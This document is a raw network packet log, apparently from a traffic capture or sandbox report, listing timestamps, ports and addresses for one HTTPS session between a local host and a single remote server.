Nov 18, 2024 18:37:26.703270912 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.703334093 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.703339100 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.703656912 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.703763962 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.703773975 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.703780890 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.703835011 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.703840017 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.703906059 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.703965902 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.704030037 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.704035044 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.704134941 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.704205990 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.704210997 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.704412937 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.704464912 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.704469919 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.704739094 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.704781055 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.704807043 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.704809904 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.704933882 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.705121994 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.705218077 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.705223083 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.705233097 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.705280066 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.705306053 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.705310106 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.705384016 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.705852985 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.705941916 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.705946922 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.706012964 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.706069946 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.706074953 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.706084967 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.706134081 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.706142902 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.706149101 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.706244946 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.706249952 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.706314087 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.706741095 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.706813097 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.706816912 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.706828117 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.706886053 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.706898928 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.706904888 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.706945896 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.706967115 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.707024097 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.707029104 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.707571030 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.707633972 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.707638979 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.707793951 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.707850933 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.707854986 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.707889080 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.707936049 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.707948923 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.707958937 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.708039045 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.708044052 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.708132029 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.708599091 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.708673954 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.708678961 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.708703041 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.708758116 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.708769083 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.708774090 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.708822012 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.708837032 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.708844900 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.708882093 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.708892107 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.708981037 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.708986044 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.709640980 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.709723949 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.709762096 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.709765911 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.709789038 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.709804058 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.709846973 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.709943056 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.709943056 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.709949017 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.710417032 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.710473061 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.710530996 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.710530996 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.710551023 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.710558891 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.710638046 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.710643053 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.710793972 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.710894108 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.710899115 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.710963964 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.711014032 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.711040974 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.711045027 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.711074114 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.711146116 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.711196899 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.711208105 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.711213112 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.711257935 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.711262941 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.711306095 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.711865902 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.711927891 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.711952925 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.711956978 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.711977005 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.711991072 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.712043047 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.712043047 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.712048054 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.712100029 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.712264061 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.712332964 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.712337017 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.712349892 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.712434053 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.712439060 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.714632988 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.714760065 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.714765072 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.714924097 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.714981079 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.715014935 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.715019941 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.715053082 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.715254068 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.715341091 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.715346098 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.715548992 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.715622902 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.715627909 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.715893984 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.715945959 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.715950966 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.715992928 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.716074944 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.716089964 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.716094017 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.716128111 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.716150999 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.716255903 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.716260910 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.716413975 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.716461897 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.716471910 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.716478109 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.716556072 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.716561079 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.716629028 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.716932058 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.716980934 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.716998100 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.717000961 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.717026949 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.717117071 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.717550993 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.717694044 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.717700005 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.717832088 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.717883110 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.717886925 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.717897892 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.717979908 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.717984915 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.718183041 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.718271971 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.718305111 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.718310118 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.718347073 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.718363047 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.718564987 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.718569994 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.719013929 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.719074011 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.719079018 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.719137907 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.719192028 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.719196081 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.719208956 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.719270945 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.719274998 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.719306946 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.719377995 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.719382048 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.719969988 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.720032930 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.720041037 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.720051050 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.720115900 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.720144033 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.720148087 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.720172882 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.720222950 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.720253944 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.720253944 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.720259905 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.720299006 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.720304012 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.720421076 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.720426083 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.720997095 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.721072912 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.721077919 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.721090078 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.721180916 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.721229076 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.721235037 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.721297026 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.721332073 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.721375942 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.721390963 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.721390963 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.721404076 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.721463919 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.722089052 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.722141981 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.722162962 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.722167015 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.722208977 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.722244978 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.722294092 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.722311020 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.722315073 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.722348928 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.722369909 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.722409964 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.722440958 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.722445011 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.722496033 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.722650051 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.722744942 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.722748995 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.722795963 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.722858906 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.722867966 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.722873926 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.722922087 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.722935915 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.722940922 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.722980976 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.723031044 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.723073959 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.723092079 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.723094940 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.723140955 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.723381996 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.723436117 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.723453045 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.723457098 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.723527908 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.723556995 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.723579884 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.723591089 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.723598003 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.723668098 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.723673105 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.723716021 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.723767042 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.723809958 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.723836899 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.723839998 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.724023104 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.724023104 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.724186897 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.724236012 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.724267006 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.724271059 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.724318981 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.724318981 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.724488974 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.724553108 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.724559069 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.724658012 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.724699020 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.724723101 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.724726915 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.724785089 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.724800110 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.724845886 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.724849939 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.724891901 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.724930048 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.724950075 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.724955082 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.724994898 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.725168943 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.725263119 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.725269079 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.725326061 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.725375891 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.725392103 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.725400925 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.725460052 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.725474119 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.725474119 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.725480080 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.725519896 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.725542068 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.725580931 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.725584984 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.725625038 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.725677967 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.725691080 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.725694895 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.725801945 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.725807905 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.725981951 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.726155996 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.726229906 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.726236105 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.726305008 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.726356983 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.726381063 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.726387978 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.726424932 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.726486921 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.726547956 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.726594925 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.726624012 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.726624012 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.726629019 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.726690054 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.726703882 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.726703882 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.726708889 CET	443	49731	142.215.209.78	192.168.2.4
